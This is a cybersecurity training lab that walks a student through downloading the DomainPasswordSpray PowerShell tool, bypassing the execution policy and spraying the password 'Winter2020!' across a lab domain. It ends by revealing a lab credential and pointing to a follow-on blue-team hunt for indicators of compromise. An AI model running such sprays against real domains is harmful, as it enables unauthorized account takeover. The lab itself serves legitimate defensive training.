L1140-Red: Domain Password Spray
Password sprays are a very common method used for lateral movement. In this lab, the student will execute a password spray against the domain. Once the password spray is completed, the student will search for indicators of compromise.
- Perform a password spray attack against the domain.
- Find indicators of compromise.
Procure the Domain Password Spray tools and execute the Password Spray. After executing the Password Spray and identifying a valid user account and password, begin the hunt for Indicators of Compromise. While hunting, determine the full scope of the Password Spray attack.
Procurement of Password Spray Tools
Login to the Member Server, WS01 and download components from GitHub.
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu.
- See Lab L0250 for instruction on launching PowerShell.
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Download and Prepare Password Spray Tool
We will now use Invoke-WebRequest to download the Domain Password Spray.
Allow TLS 1.2
Allow TLS 1.2 with Invoke-WebRequest, this is necessary as TLS1.2 is disabled by default for Invoke-WebRequest on Windows 2016. The command returns to the PowerShell prompt. This is expected. This change is only persistent for this PowerShell session.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Download using Invoke-WebRequest
Use Invoke-WebRequest to download the necessary components. Each of these commands will download the package from the URI specified and save it to the filename specified with the -OutFile flag.
Invoke-WebRequest –URI "https://github.com/dafthack/DomainPasswordSpray/archive/master.zip" -OutFile "~\Downloads\master.zip"
Expand Tool-set Archive
cd ~\Downloads\
Expand-Archive "master.zip"
With the tools now available on the desktop, and a PowerShell session launched in the appropriate folder, move to the next section of the lab to execute the malware.
Execute the Domain Password Spray Tools
Login to the Member Server, WS01 and download components from GitHub.
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu.
- See Lab L0250 for instruction on launching PowerShell.
- If you are already have a session open, use the current session.
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Execute Domain Password Spray Tools
The below commands ran in powershell will execute a password spray on the domain environment.
cd ~\Downloads\master\DomainPasswordSpray-master
Set-ExecutionPolicy Bypass -Force
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Winter2020! -Force
 |
|---|
You have successfully procured the Domain Password Spray tool and executed it against the local domain.
- As a result, you have identified a correct spray-guess of ** Luis.Graves:Winter2020! **.
Continue on to L1140-Blue to hunt for indicators of compromise.
